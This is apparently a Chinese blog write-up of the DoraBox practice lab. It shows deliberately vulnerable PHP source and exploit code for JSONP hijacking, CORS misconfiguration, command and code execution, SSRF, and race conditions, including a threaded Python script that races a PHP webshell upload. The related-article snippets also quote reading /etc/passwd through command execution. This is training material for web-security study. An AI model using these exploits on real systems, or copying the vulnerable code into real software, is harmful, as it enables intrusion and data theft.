DoraBox

最新推荐文章于 2021-09-07 15:20:00 发布
最新推荐文章于 2021-09-07 15:20:00 发布
阅读量427 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/B_roin/article/details/105029145
版权

CSRF

CSRF跨站点请求伪造(Cross—Site Request Forgery),具有很大的危害性

攻击原理:
用户访问一个存在CSRF漏洞的网站后,网站返回cookie给浏览器,同时在用户未退出该网站之前,在同一浏览器访问了恶意网站,该恶意网站,则会返回攻击性代码,请求访问那个存在漏洞的网站。浏览器接收到攻击代码后,会执行恶意网站的请求——访问刚刚那个网站,网站利用cookie登录。

参考资料:https://blog.csdn.net/xiaoxinshuaiga/article/details/80766369

JSONP劫持

JSONP就是为了跨域 获取资源 而产生的一种 非官方 的技术手段(官方的有 CORS 和 postMessage)
利用<script>元素标签,远程调用JSON文件实现数据传递

:查看源码
在这里插入图片描述

<?php
	include "../class/function.class.php";
	$reqMethod = "GET";
	$reqValue = "callback";
	$p = new Func($reqMethod, $reqValue);
	$info = array('username' => 'Vulkey_Chen', 'mobilephone' => '13188888888', 'email' => 'admin@gh0st.cn', 'address' => '中华人民共和国', 'sex' => 'Cool Man');
	if(!@$_GET['callback']){
		echo $p -> con_function('json_encode',$info);  //如果没有callback,则显示$info中的内容,也就是我们需要的
	}else{
	//如果存在callback,那么对callback进行处理后加上$info的内容,即上图的样子
		$callback = htmlspecialchars($_GET['callback']);
		echo "{$callback}(" . $p -> con_function('json_encode',$info) . ")";
	}
?>

:利用alert弹窗,将内容显示出来,编写代码如下

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>DoraBox - JSONP</title>
</head>
<body>
<script type="text/javascript">
function test(n)
	{
		alert(n.address);
	}
</script>
<script type="text/javascript" src="http://127.0.0.1/DoraBox-master/csrf/jsonp.php?callback=test"></script>
</body>
</html>

:得到address的内容
在这里插入图片描述

CORS跨域资源读取

参考资料:https://blog.csdn.net/u014029795/article/details/103231139
:查看源码

<?php
	if (@$_SERVER['HTTP_ORIGIN']){
		//判断是否存在http_origin 
		header("Access-Control-Allow-Origin: ".$_SERVER['HTTP_ORIGIN']);//如果有就允许该origin
	}else{
		header("Access-Control-Allow-Origin: *");//如果没有就允许所有origin
	}
	header("Access-Control-Allow-Headers: X-Requested-With");
	header("Access-Control-Allow-Credentials: true");
	header("Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS");

	$info = array('username' => 'Vulkey_Chen', 'mobilephone' => '13188888888', 'email' => 'admin@gh0st.cn', 'address' => '中华人民共和国', 'sex' => 'Cool Man');
	echo json_encode($info);
?>

:emm。。没有思路,根据参考资料

<!doctype html>
<html>
<title>test file cors</title>
<body>
<script>
function sendAjax() {
  //构造表单数据
  //var formData = new FormData();
  //formData.append('username', 'johndoe');
  //formData.append('id', 123456);
  //创建xhr对象 
  var xhr = new XMLHttpRequest();
  //设置xhr请求的超时时间
  xhr.timeout = 3000;
  //设置响应返回的数据格式
  xhr.responseType = "text";
  //创建一个 GET 请求,采用异步
  xhr.open('GET', 'http://127.0.0.1/DoraBox-master/csrf/userinfo.php', true);
  //注册相关事件回调处理函数
  xhr.onload = function(e) { 
    if(this.status == 200||this.status == 304){
        //document.write(this.responseText);
		alert(this.responseText);
    }
  };
  //xhr.ontimeout = function(e) { ... };
  //xhr.onerror = function(e) { ... };
  //xhr.upload.onprogress = function(e) { ... };
  
  //发送数据
  //xhr.send(formData);
  xhr.send();
}
sendAjax();
</script>
</body>
</html>
<hr>

:本机连接,得到如下图
在这里插入图片描述

代码/命令

任意代码执行

任意代码执行漏洞简介:https://blog.csdn.net/sdb5858874/article/details/80788933
php中例如evalassert函数,在将字符串转换成代码的过程中没有考虑,攻击者对字符串的控制,造成代码注入漏洞

:尝试执行一句话木马,得到如下报错
在这里插入图片描述
发现利用的是assert()函数,assert()函数在php中是用来判断表达式是否成立的,返回布尔值

:执行phpinfo(),会直接执行成功
在这里插入图片描述

任意命令执行

:查看源码

<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<title>DoraBox - 命令执行</title>
</head>
<body>
<?php
	include "../class/function.class.php";
	$p = new Func("GET","command");
	$p -> con_html();
	if (isset($_REQUEST['submit'])) {
		$command = $_REQUEST['command'];
		echo $p -> con_function('exec',$command);
	}
?>
</body>
</html>

exec()函数是用来执行一个外部程序,在Linux中的使用较多

exec语法:
string exec(string command, string [array], int [return_var]);
command:需要执行的命令
array:输出值
return_var:返回值0或1

:随便执行命令,例如:ipconfigwhoami

SSRF

SSRF (Server-side Request Forge, 服务端请求伪造)
它是由服务器发起的,并且该攻击目标一般是内网系统
服务端具有从其他服务器获取数据的功能,但是没有对协议等进行限制和过滤

:输入1,发生报错,返回如下报错信息
在这里插入图片描述
发现用的是file_get_contents()函数,该函数用于将整个文件读入一个字符串中
:尝试访问http://4399.com,成功访问
在这里插入图片描述
:尝试访问本机的网页,成功访问
在这里插入图片描述

其他

条件竞争——支付

条件竞争:https://blog.csdn.net/u014029795/article/details/102913219
程序开发时对并发问题的处理不到位,多线程的请求,出现逻辑缺陷,大多出现在金额同步,支付等

:查看,分析源码

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>支付页面</title>
</head>
<body>
<?php 
include('../conn.php');
$db = new mysqli(DB_HOST, DB_USER, DB_PASS, DB_NAME);
$sql = "SELECT rest FROM account";
$rest = intval($db->query($sql)->fetch_assoc()['rest']);
$sql = "SELECT own FROM account";
$own = intval($db->query($sql)->fetch_assoc()['own']);
echo "
<form action='' method='post'>
    余额:{$rest}元
    <br>
    支付<input type='text' name='money'>元给林晨去买辣条<br>
    <input type='submit' value='支付'><br>
    林晨现在手里有{$own}元
</form>
";
if ($_POST){
    $money = intval($_POST['money']);
    if($money <= $rest) {
        $sql = "UPDATE account SET rest=rest-".$money;
        $db->query($sql);
        $sql = "UPDATE account SET own=own+".$money;
        $db->query($sql);
        echo "<script>alert('支付成功');window.location.href=this.location.href</script>";
    } else {
        echo "支付失败,可能是因为您的余额不足。";
    }
}
?>
</body>
</html>

:分析源码,假想多线程的进行,我有余额15,同时发出两次请求,支付15元给林晨,第一次和第二次请求同时到了数据库判断$sql = "SELECT rest FROM account";这一步,返回同样的结果, 第一次请求判断可以支付该语句中的$sql = "UPDATE account SET rest=rest-".$money;rest变量的值修改了,但是数据库的值还没改,而第二次请求也到了,所以$rest又减了一次,最后的余额就会变成负数
:这里我们利用作者给出的PoC来看,这里是跑了50次
在这里插入图片描述
:but,我又出现问题了。。
在这里插入图片描述

解决方法1:https://blog.51cto.com/suyanzhu/2313798
解决方法2:https://blog.csdn.net/u012106306/article/details/80760744
然而,我并没有解决。。

:哎。

条件竞争——上传

:分析代码,程序想表达–>文件上传后,检查后缀,若不在白名单,则删除文件

 <?php
show_source(__FILE__);
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./uploads/";
$filename = $_FILES['myfile']['name'];

if (is_uploaded_file($_FILES['myfile']['tmp_name'])){
    if (!move_uploaded_file($_FILES['myfile']['tmp_name'],$path.$filename)){
        die("error:can not move!");
    }   
} else {
    die("error:not an upload file!");
}

$newfile = $path.$filename;
echo "file upload success.file path is: ".$newfile."\n<br />";

if ($_FILES['myfile']['error'] > 0){
    unlink($newfile);
    die("Upload file error: ");
}

$ext = array_pop(explode(".",$_FILES['myfile']['name']));
if (!in_array($ext,$allowtype)){
    unlink($newfile);
    die("error:upload the file type is not allowed,delete the file!");
}
?>
error:not an upload file!

竞争点在于,先执行文件还是先删除文件
:考虑多线程,写两个php一句话木马,和上一个一样的分析方法,以达到执行一个php文件的效果,这里还是利用作者的PoC

import requests
import threading
import os

class RaceCondition(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)

        self.url = 'http://.../key.php' #上传的文件地址
        self.uploadUrl = 'http://.../upload.php' #上传文件的地址

    def _get(self):
        print('try to call uploaded file...')
        r = requests.get(self.url)
        if r.status_code == 200:
            print('[*] create file info.php success.')
            os._exit(0)

    def _upload(self):
        print('upload file...')
        file = {'myfile': open('key.php', 'r')} #本地脚本木马
        requests.post(self.uploadUrl, files=file)

    def run(self):
        while True:
            for i in range(5):
                self._get()

            for i in range(10):
                self._upload()
                self._get()

if __name__ == '__main__':
    threads = 50    

    for i in range(threads):
        t = RaceCondition()
        t.start()

    for i in range(threads):
        t.join()

:但是我依旧搞不起。。。

任意文件读取

任意文件读取,emm,就读取file_read.php
在这里插入图片描述

XXE
B_ronin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JSONP跨域访问漏洞
Echo__h的博客
05-02 709
构造如下页面,创建恶意链接诱使用户点击,即可获取用户的信息// 调用stringfy方法,将JSON对象转换为字符串 alert(JSON . stringify(args));//"> // %2B为+ %26为& < / script >模拟用户访问,成功将cookie和url地址添加到数据库。
浅谈JSONP跨域漏洞
weixin_39664643的博客
10-11 2768
浅谈JSONP跨域漏洞 CSRF(Cross site request forgery)跨站请求伪造,一种挟持用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法,跟XSS相比,XSS 利用的是网站对用户的信任,CSRF 利用的是网站对用户网页浏览器的信任。 提起CSRF,可能很多人都会想到修改个人资料、授权登陆等等攻击场景,可以发现这两个场景都是写入型的CSRF漏洞,通常会忽视更常见的读取型的CSRF漏洞,主流如下两种 JSONP跨域资源读取 CORS跨域资源读取 当持有敏感资源数据的服务器没
DoraBox-master综合性靶机练习
滕财然的博客
05-18 1508
文章目录1、SQL注入sql数字型:sql字符型:sql搜索型:2、XSS跨站脚本攻击XSS反射型:XSS存储型:XSS DOM型:3、CSRFJSONP劫持:CORS跨域资源读取:4、文件包含任意文件包含:目录限制文件包含:5、文件上传任意文件上传:JS限制文件上传MIME限制文件上传扩展名限制文件上传内容限制文件上传6、命令执行任意代码执行:任意命令执行:7、SSRF8、其它条件竞争-支付条件竞争-上传任意文件读取XXE 1、SQL注入 攻击者可以提交一段精心构造的数据库查询代码,根据返回的结果,获得
DoraBox-代码/命令 其他
baynk的博客
11-25 977
0x00 前言 DoraBox最后一篇了,把其余的都写进来。感觉这个靶场弄的好快。。。 0x01 任意代码执行 输入test得到如下报错,原来用的是assert函数 那这里直接就可以使用phpinfo()了。 0x02 任意命令执行 运行cat /etc/passwd出来的结果。。 只有一行输出,其实这个时候干啥都可以,比如echo xxx > /var/www/html/xxxx...
DoraBox实战】————9、任意文件读取
Fly_鹏程万里
08-10 756
任意文件读取 在web安全中,任意文件读取漏洞是非常常见的一种漏洞,属于文件操作类漏洞,一般常见于PHP/java/python语言中,任意文件读取漏洞,顾名思义,就是可以任意读取服务器上部分或者全部文件的漏洞,攻击者利用此漏洞可以读取服务器敏感文件如/etc/passwd,/etc/sadow,web.config。漏洞一般存在于文件下载参数,文件包含参数。主要是由于程序对传入的文件名或者...
DoraBox-master.zip
03-17
DoraBox靶场:新手入门Web安全与漏洞分析实践》 DoraBox-master.zip是一个专为初学者设计的靶场资源,旨在帮助用户熟悉和掌握Web安全领域中的基础概念和漏洞利用技术。靶场是一种模拟真实环境的安全训练平台,...
AHRID-黑客攻击画像分析系统.zip
12-11
漏洞地址:http://my.website/dorabox/csrf/jsonp.php?callback=test 要获取的信息:username 模块提交说明: 1. 名字模块名字(建议使用英文) 2. SRC存在JSONP劫持漏洞的URL地址 3. 回调参数值回调参数的值...
DoraBox 漏洞练习平台
weixin_30477797的博客
04-29 1070
项目地址: https://github.com/gh0stkey/DoraBox SQL注入 SQLi 数字型 判断表中有多少列 http://127.0.0.1/DoraBox/sql_injection/sql_num.php?id=1%20order%20by%201&submit=submit 依次增大order by 后面的值,直到报错,报错...
DoraBox靶场(二)CSRF
Lorezon的博客
03-17 632
JSONP劫持
斐讯k2p潘多拉固件
03-30
潘多拉是基于openwrt开源固件,插件功能很多非常好用 。
DoraBox 练习
yqdid的博客
03-01 512
SQL 注入 数字型 1 查找注入点。因为是数值型,所以就直接用数值型注入办法。 2.-1 order by 3 # 查看列数。 3. 爆数据库名为pentest:-1 union select 1,2,database() # 4. 看数据库你让有哪些表名:-1 union select 1,2,group_concat(table_name) from information_schema...
【愚公系列】2023年05月 Web渗透测试之文件包含
时光隧道
08-24 5万+
文件包含漏洞是一种常见的Web应用程序安全漏洞,它允许攻击者读取或执行不属于他们的文件或代码。文件包含漏洞可以分为两种类型:本地文件包含漏洞和远程文件包含漏洞。本地文件包含漏洞发生在Web应用程序服务器上,并使攻击者能够读取和执行位于同一服务器上的文件。远程文件包含漏洞则发生在Web应用程序服务器和另一个服务器之间,使攻击者能够读取和执行远程服务器上的文件。在本地文件包含漏洞中,攻击者可以通过改变应用程序请求参数的值,如URL或cookie的值,来读取或执行不应该被公开的文件。
搭建DoraBox 2021/9/7
cutjgh的博客
09-07 900
一.下载 下载地址: https://github.com/0verSp4ce/DoraBox 步骤: 先下好数据包 2.将压缩包解压到 phpStudy\PHPTutorial\WWW 目录下 要是弄错位置了,可能就会出现这种情况,所以一定是解压在www目录下 3.修改数据 4.启动phpstudy,导入数据库 5.点击“导入”后,在确保php是运行的情况下访问http://127.0.0.1/DoraBox-master/ 安装完成 ...
DoraBox实战】————4、文件包含分析与研究
Fly_鹏程万里
08-07 676
文件包含简介 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为包含。 程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。文件包含漏洞在PHP Web Application中居多,而在JSP,ASP...
DoraBox实战】————3、CSRF分析与研究
Fly_鹏程万里
08-07 697
CSRF简介 CSRF的全名为Cross-site request forgery,它的中文名为跨站请求伪造。 CSRF是一种挟持用户在已经登陆的web应用程序上执行非本意的操作的攻击方式。相比于XSS,CSRF是利用了系统对页面浏览器的信任,XSS则利用了系统对用户的信任。 你也可以这样来理解:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了...
PoCBox – 漏洞测试验证辅助平台
anquanniu的博客
02-21 2750
开发这个平台的初衷是帮助自己在漏洞挖掘测试中更加方便快捷的辅助自己进行漏洞验证。 作者:Vulkey_Chen 博客:http://gh0st.cn 团队:米斯特安全团队 Www.Hi-OurLife.Com 原文链接:https://zhuanlan.zhihu.com/p/56296101 一开始的想法是框架化、模块化,但是开发着开发着就发现有点累,于是采用了原始的方法去开发:原生JavaSc...
【愚公系列】2023年05月 Web渗透测试之XXE攻击
热门推荐
时光隧道
08-24 5万+
XXE攻击是指攻击者利用XML解析器漏洞,通过在XML文档中注入恶意代码来攻击服务器的一种类型的攻击。攻击者通常会利用XXE攻击来读取本地文件、执行任意命令、进行内部端口扫描等。这种攻击方式很危险,因为它可以直接访问服务器内部的敏感数据,造成严重的安全威胁。为了防止XXE攻击,我们通常需要对输入的XML文档进行过滤和验证,避免恶意代码的注入。
文件上传-条件竞争-DoraBox
W小哥
01-06 4006
一、条件竞争的概念 发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中 二、文件上传-条件竞争源码 三、文件上传-条件竞争漏洞使用方法 我门可以猜测源码,这里应该是我们成功上传了php文件但后端在短时间内将其删除了,所以我们要抢到在它删除之前访问文件,就如我们打开文件的时候去删除它,会提示文件文件已打开一样,这样从而防止文件被删除。 利用木马文件: 上传PHP木...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值